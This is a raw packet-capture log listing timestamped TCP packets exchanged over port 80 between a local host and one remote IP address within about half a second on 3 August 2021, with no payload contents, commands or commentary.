Aug 3, 2021 16:50:37.303015947 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303035021 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303046942 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303057909 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303076029 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303096056 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303132057 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303131104 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303158045 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303158045 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303183079 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303183079 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303199053 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303210974 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303220987 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303237915 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303248882 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303261995 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303273916 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303287983 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303292036 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303312063 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303323030 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303340912 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303349972 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303369045 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303388119 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303399086 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303412914 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303416014 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303430080 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303441048 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303448915 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303469896 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303479910 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303495884 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303513050 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303519964 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303534031 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303545952 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303560972 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303570032 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303580046 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303594112 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303610086 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303618908 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303627014 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303643942 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303659916 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303670883 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303680897 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303699017 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303711891 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303723097 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.303730965 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.303761959 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.306837082 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.468168020 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.468214989 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.468236923 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.468259096 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.468278885 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.468301058 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.468326092 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.468348980 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.468465090 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.468519926 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.473170042 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.473208904 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.473229885 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.473248959 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.473270893 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.473292112 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.473309994 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.473337889 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.473359108 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.474436998 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474471092 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474493027 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474514008 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474530935 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474546909 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474565029 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.474571943 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474581957 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.474596024 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474607944 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.474616051 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474622011 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.474638939 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474661112 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474668980 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.474682093 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474698067 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.474704027 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474724054 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474746943 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474749088 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.474767923 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474787951 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474800110 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.474808931 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474829912 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474834919 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.474849939 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474858999 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.474870920 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474890947 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474896908 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.474915028 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474925041 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.474936008 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474966049 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474987984 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.474997044 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.475008965 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.475028038 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.475049973 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.475054979 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.475071907 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.475096941 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.475105047 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.475131035 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.475136995 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.475161076 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.475172043 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.475183010 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.475218058 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.475250959 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.477889061 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.635797977 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.635847092 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.635871887 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.635900974 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.635926008 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.635950089 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.635996103 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.636019945 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.636044979 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.636068106 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.636091948 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.636157036 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.636183023 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.636209011 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.636226892 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.636312008 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.642000914 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.642026901 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.642050982 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.642072916 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.642095089 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.642117023 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.642127991 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.642141104 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.642163038 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.642175913 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.642184973 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.642208099 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.642213106 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.642231941 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.642245054 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.642255068 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.642273903 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.642301083 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.643388033 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643419981 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643455029 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.643480062 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.643548012 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643591881 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.643649101 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643675089 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643697023 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643711090 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.643722057 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643732071 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.643748045 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643760920 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.643769979 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643791914 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643815994 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.643816948 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643820047 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.643841028 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643851042 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.643866062 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643877983 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.643888950 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643914938 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643924952 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.643940926 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643961906 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.643984079 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644004107 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644023895 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644045115 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644066095 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644121885 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644124985 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644131899 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644134998 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644136906 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644140005 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644143105 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644144058 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644145012 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644166946 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644181013 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644188881 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644210100 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644211054 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644232988 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644239902 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644257069 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644278049 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644279957 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644301891 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644304037 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644325018 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644332886 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644346952 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644361973 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644390106 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644398928 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644423962 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644442081 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644447088 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644468069 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644495010 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644498110 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644520044 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644540071 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644541979 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644563913 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644565105 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644591093 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644593954 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644613981 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644632101 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644635916 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644658089 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644659996 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644680023 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644685984 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644702911 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644712925 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644725084 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644742966 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644746065 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644769907 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644772053 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644795895 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644797087 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644818068 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644826889 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644839048 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644860029 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644862890 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644884109 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644887924 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644906044 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644917011 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644927979 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644948006 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.644953012 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.644982100 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.645005941 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.645009041 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.645030975 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.645040035 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.645054102 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.645066023 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.645076036 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.645097971 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.645098925 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.645119905 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.645128965 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.645138979 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.645159960 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.645160913 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.645180941 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.645190954 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.645205975 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.645221949 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.645261049 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.803841114 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.803869009 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.803893089 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.803913116 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.803935051 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.803956032 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.803982019 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804007053 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804028988 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804048061 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.804052114 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804073095 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804094076 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804105043 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.804116011 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804136038 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804155111 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.804160118 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804184914 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804193974 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.804204941 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804227114 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804234028 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.804249048 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804270983 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804270983 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.804294109 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804305077 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.804315090 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.804344893 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.804379940 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.807071924 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.809920073 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.809948921 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.809967041 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.809990883 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810008049 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810025930 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810044050 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810055971 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810060978 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810070992 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810084105 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810090065 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810106993 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810126066 CEST	49167	80	192.168.2.22	13.229.216.142
Aug 3, 2021 16:50:37.810128927 CEST	80	49167	13.229.216.142	192.168.2.22
Aug 3, 2021 16:50:37.810141087 CEST	49167	80	192.168.2.22	13.229.216.142
